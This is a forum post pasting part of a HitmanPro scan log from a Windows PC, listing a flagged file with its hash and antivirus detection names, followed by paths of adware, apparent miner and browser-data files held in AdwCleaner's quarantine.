          5.6s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.6s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.0s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.5s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.7s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.6s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

BaBi · 13.02.2017, 22:58

hitman teil 4

Code:

ATTFilter

   C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
      Size . . . . . . . : 122.880 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : CE5D370F424E98BEE6A805E2336D197110946548452650F0D44851CE17829810
      Version  . . . . . : 2.0.0.11
      Copyright  . . . . : Copyright (C) 2015
    > Bitdefender  . . . : Gen:Variant.Graftor.304300
    > Kaspersky  . . . . : Trojan.Win32.Vilsel.cufb
    > HitmanPro  . . . . : Mal/Generic-S
      Fuzzy  . . . . . . : 103.0
      Forensic Cluster
         -2.3s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.2s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.8s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.7s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.7s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.6s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.5s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.0s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.6s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.6s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.3s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.3s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
